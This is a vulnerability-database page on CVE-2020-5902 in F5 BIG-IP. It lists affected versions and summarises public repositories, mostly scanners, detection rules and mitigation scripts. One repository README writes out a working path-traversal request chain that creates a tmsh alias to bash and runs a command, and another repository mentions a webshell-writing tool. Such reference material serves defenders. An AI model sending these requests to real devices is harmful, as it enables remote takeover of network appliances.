CVE-2020-5902

Published: 01/07/2020 Updated: 07/08/2020
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

F5 BIG-IP could allow a remote malicious user to execute arbitrary code on the system, caused by a flaw in the Traffic Management User Interface (TMUI). By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

Affected Products

Vendor: F5 (all rows). Product: affected versions.

F5 BIG-IP Access Policy Manager: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.2, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Advanced Firewall Manager: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.4, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Analytics: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Application Acceleration Manager: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.4, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Application Security Manager: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Domain Name System: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Fraud Protection Service: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Global Traffic Manager: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Link Controller: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Local Traffic Manager: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.4, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1, 15.1.0.2

F5 BIG-IP Policy Enforcement Manager: 11.6.1, 11.6.2, 11.6.3, 11.6.3.1, 11.6.3.2, 11.6.3.3, 11.6.3.4, 11.6.4, 11.6.5, 11.6.5.1, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 12.1.3.1, 12.1.3.2, 12.1.3.3, 12.1.3.4, 12.1.3.5, 12.1.3.6, 12.1.3.7, 12.1.4, 12.1.4.1, 12.1.4.2, 12.1.5, 12.1.5.1, 13.1.0, 13.1.0.0, 13.1.0.1, 13.1.0.2, 13.1.0.3, 13.1.0.4, 13.1.0.5, 13.1.0.6, 13.1.0.7, 13.1.0.8, 13.1.1, 13.1.1.1, 13.1.1.3, 13.1.1.4, 13.1.1.5, 13.1.2, 13.1.3, 13.1.3.1, 13.1.3.2, 14.1.0, 14.1.0.1, 14.1.0.2, 14.1.0.3.0.79.6, 14.1.0.3.0.97.6, 14.1.0.3.0.99.6, 14.1.0.5, 14.1.0.5.0.15.5, 14.1.0.5.0.36.5, 14.1.0.5.0.40.5, 14.1.0.6, 14.1.0.6.0.11.9, 14.1.0.6.0.14.9, 14.1.0.6.0.68.9, 14.1.0.6.0.70.9, 14.1.2, 14.1.2.0.11.37, 14.1.2.0.18.37, 14.1.2.0.32.37, 14.1.2.1, 14.1.2.1.0.14.4, 14.1.2.1.0.16.4, 14.1.2.1.0.34.4, 14.1.2.1.0.46.4, 14.1.2.1.0.97.4, 14.1.2.1.0.99.4, 14.1.2.1.0.105.4, 14.1.2.1.0.111.4, 14.1.2.1.0.115.4, 14.1.2.1.0.122.4, 14.1.2.2, 14.1.2.3, 14.1.2.5, 15.0.0, 15.0.1, 15.0.1.0.33.11, 15.0.1.0.48.11, 15.0.1.1, 15.0.1.2, 15.0.1.3, 15.1.0, 15.1.0.1

F5 SSL Orchestrator: 14.1.2, 15.0.1

Mailing Lists

F5 Big-IP versions 1313 Build 006 and below suffer from a local file inclusion vulnerability ...

GitHub Repositories

Latest commit: tom0li, 57368c0, "Create README.md"
Files: README.md
README: CVE-2020-5902 RCE
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/WWWWW&content=id
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/WWWWW
Reference: Orange Tsai, Breaking Parser Logic: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
About: CVE-2020-5902
Topics: f5, cve-2020-5902

Latest commit: lijiaxing1997, 08a6dd1, "Merge branch 'master' of https://github.com/lijiaxing1997/CVE-2020-59… …02-POC-EXP wait..#"
Files: README.md, f5_ip.txt, f5_rce.py
README: CVE-2020-5902-POC-EXP. Batch scan for CVE-2020-5902, remote code execution, tested.
Languages: Python 100.0%

Latest commit: rjouhann, 99a2561, "add script CVE-2020-5902"
Files: f5-bigiq-SSLcertKeyCRLimportTool, f5-bigiq-TMUI-RCE-vulnerability-CVE-2020-5902, f5-bigiq-as3-rpm-update, f5-bigiq-branchRuleManager, f5-bigiq-connectivityChecks, f5-bigiq-do-rpm-update, f5-bigiq-licenseUtilityReport, f5-bigiq-sanitizeUsageReport, f5-bigiq-syncSharedAFMobjectsTool, README.md
README: F5 BIG-IQ Product Management Team: Tools
This GitHub repository is managed by the F5 BIG-IQ Product Management Team. Bugs and requests for enhancements can be made by opening an issue within the repository.
Tools:
f5-bigiq-TMUI-RCE-vulnerability-CVE-2020-5902: This script will help you mitigate CVE-2020-5902 using the Script Management feature on BIG-IQ. Check K54909607 for more details.
f5-bigiq-as3-rpm-update: This script will help you update AS3 on BIG-IQ. Check K54909607 for more details.
f5-bigiq-do-rpm-update: This script will help you update DO on BIG-IQ. Check K54909607 for more details.
f5-bigiq-connectivityChecks: This script will run a sequence of checks to verify connectivity between BIG-IQ CM, DCD and BIG-IPs.
f5-bigiq-SSLcertKeyCRLimportTool: Automate import of SSL cert, key and CRL from BIG-IP to BIG-IQ. /!\ This feature is available in BIG-IQ 7.0 /!\
f5-bigiq-licenseUtilityReport: Utility Billing Report. Generate a usage report for your utility license(s) and provide it to F5 Networks Inc. for billing purposes. /!\ This feature is available in BIG-IQ 6.1 /!\
f5-bigiq-f5sanitizeUsageReport: Script to obfuscate IP/MAC addresses and hostnames in a BIG-IQ JSON report. /!\ This feature is available in BIG-IQ 6.1 /!\
f5-bigiq-syncSharedAFMobjectsTool: Script to export AFM objects (port lists, address lists, rule lists, policies and policy rules) from one BIG-IQ to another.
f5-bigiq-branchRuleManager: This script will allow you to set advanced expressions for branch rules in access policies (per-session and per-request).
About: BIG-IQ Product Management Team Repository
Topics: big-iq, api-rest, scripts, bash, license
Contributors: rjouhann, focrensh
Languages: Shell 51.4%, Python 26.7%, Perl 21.9%

Latest commit: qiong-qi, eebf55f, "Create README.md"
Files: CVE-2020-5902.py, README.md
README: CVE-2020-5902-POC. Batch detection for CVE-2020-5902.
Usage: python3 CVE-2020-5902.py infile.txt
Languages: Python 100.0%

Latest commit: theLSA, 17f70f9, "first commit lcl"
Files: batch_result/20200708103305, hsqldb_auth_bypass_batch_result/20200709162928, img, 1-2-f5.txt, LICENSE, README.md, f5-bigip-rce-cve-2020-5902.py
README: f5-bigip-rce-cve-2020-5902
License: MIT License
Languages: Python 100.0%

Latest commit: cybersecurityworks553, fb94c84, "Update README.md"
Files: README.md, Sample-Input-ip.txt, Scanner_CVE-2020-5902.py
README: Scanner CVE-2020-5902. The script will run checks for CVE-2020-5902.
Usage: provide a list of IP addresses in "ip.txt" to scan for CVE-2020-5902. Default port: 443.
Sample output:
[+] Host is vulnerable to CVE-2020-5902:[IP Address]
[+] Host is not vulnerable to CVE-2020-5902:[IP Address]
About: CVE-2020-5902 scanner
Languages: Python 100.0%

Latest commit: root, 6e27fda, "CVE-2020-5902"
Files: README.md, f5-big-ip-scan.go, gettitle.go, inspur.go, mpvpn.go, phpstudy_getshell.go, phpstudybackdoorscan.go, pocstest.go
README:
mpvpn.go: Maipu VPN password cracking tool
inspur.go: Inspur server password cracking tool
nessustoexcle (planned): convert Nessus scan results to Excel
SqlInjectionFuzz (planned): SQL injection fuzzing tool
GetTitle: not very polished, good enough for now; fetches website status codes and titles
poctest: a crude PoC testing tool
xssscan (planned): XSS scanning tool
phpstudy_getshell: writes a webshell through the phpStudy backdoor
phpstudybackdoorscan: batch scan for the phpStudy backdoor
shiroKEYcheck: Apache Shiro key cracking
f5-big-ip-scan: F5 BIG-IP vulnerability scan for CVE-2020-5902
About: some small tools
Releases: 1 (phpstudy_getshell for linux, latest, on May 4)
Contributors: 2 (shigophilo)
Languages: Go 100.0%

Latest commit: benjeems, 6e728f1, "Add files via upload"
Files: scripts, LICENSE, README.md, bro-pkg.meta, zkg.meta
README: CVE-2020-5902 (F5 BIG-IP devices)
Summary: A Zeek detection package for CVE-2020-5902, a CVSS 10.0 vulnerability affecting F5 Networks BIG-IP devices.
References:
https://corelight.blog
https://support.f5.com/csp/article/K52145254
https://us-cert.cisa.gov/ncas/alerts/aa20-206a
Notices raised: By default both notices are enabled. If you'd like to enable only the notice concerning a successful exploit, change the option in scripts/bigIPF5.zeek to True, i.e. option only_monitor_for_successful_exploit: bool = T;

Notice                  Enabled by default?   Disabled when only_monitor_for_successful_exploit = T?
BIGIP_exploit_attempt   Yes                   Yes
BIGIP_exploit_success   Yes                   No

Notices include up to 1500 bytes of the HTTP request headers as well as URI information, which can help speed up incident response and triage without necessarily needing to refer back to a pcap.

Example (notice.log):
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2020-07-27-16-57-12
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] interval string string string double double
1595831352.218935 C9EcoD1bu0ertt08bb 192.168.31.37 63034 192.168.1.3 80 - - - tcp CVE_2020_5902::BIGIP_exploit_attempt An attempt to exploit an F5 BIG-IP device via CVE-2020-5902 was detected using uri '/hsqldb;' , however the server responded with a code='404' reason='Not Found', indicating the exploit attempt failed. The HTTP request headers are '{\x0a\x09[1] = [original_name=User-Agent, name=USER-AGENT, value=Wget/1.20.3 (darwin19.0.0)],\x0a\x09[2] = [original_name=Accept, name=ACCEPT, value=*/*],\x0a\x09[3] = [original_name=Accept-Encoding, name=ACCEPT-ENCODING, value=identity],\x0a\x09[4] = [original_name=Host, name=HOST, value=192.168.1.3],\x0a\x09[5] = [original_name=Connection, name=CONNECTION, value=Keep-Alive]\x0a}'. Refer to https://support.f5.com/csp/article/K52145254 - 192.168.31.37 192.168.1.3 80 - - Notice::ACTION_LOG 3600.000000 - - - - -

Usage, notes and recommendations:
To use against a pcap you already have: zeek -Cr scripts/__load__.zeek your.pcap
This package will run in live clustered or non-clustered environments.
This package has been prepared based on a selection of currently available public information, not against pcaps of exploits.
Feedback: As details emerge, we are keen to improve this package for the benefit of the community; please feel free to contact the author with any suggestions and feedback.
About: A network detection package for CVE-2020-5902, a CVSS 10.0 vulnerability affecting F5 Networks, Inc BIG-IP devices.
License: BSD-3-Clause License
Languages: Zeek 100.0%

Latest commit: Zinkuth, e31eee1, "Create CVE-2020-5902 Exploit POC.md"
Files: CVE-2020-5902 Exploit POC.md
About: No description, website, or topics provided.

Latest commit: qlkwej, fb6f2e1, "Update README.md"
Files: CVE-2020-check.py, README.md, example1.png, usage1.png
README: PoC for CVE-2020-5902. This is just a sample PoC to demonstrate the issue.
Limitation: only scans HTTPS for now; it can be configured to scan HTTP or any custom port(s).
Usage and Proof: shown as screenshots only (usage1.png, example1.png).
About: dummy poc
Languages: Python 100.0%

Latest commit: k3nundrum, 273c78e, "Create CVE-2020-5902.py"
Files: CVE-2020-5902.py
About: No description, website, or topics provided.
Languages: Python 100.0%

Latest commit: rwincey, 85682c8, "Create http-f5-tmui-path-traversal.nse. Simple nmap script for detecting CVE-2020-5902."
Files: http-f5-tmui-path-traversal.nse
About: No description, website, or topics provided.
Languages: Lua 100.0%

Latest commit: heiyu121, e172bd2, "CVE-2020-5902 reproduction"
Files: CVE/CVE-2020-5902, README.md
README: Licae. A CVE vulnerability library, built up step by step.
About: small project
Languages: Python 100.0%

Latest commit: xyele, 12dfe77, "Nuclei Template"
Files: CVE-2020-5902.yaml, LICENSE, README.md
README: CVE-2020-5902. In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
License: GPL-3.0 License

Repository by cristiano-corrado. Latest commit e4543eb (4 minutes ago): "first commit". 2 commits, 1 branch, 0 tags.
Files: conf, README.md, f5_scanner.py, logger.py, requirements.txt, threads.py (all "first commit", 4 minutes ago).
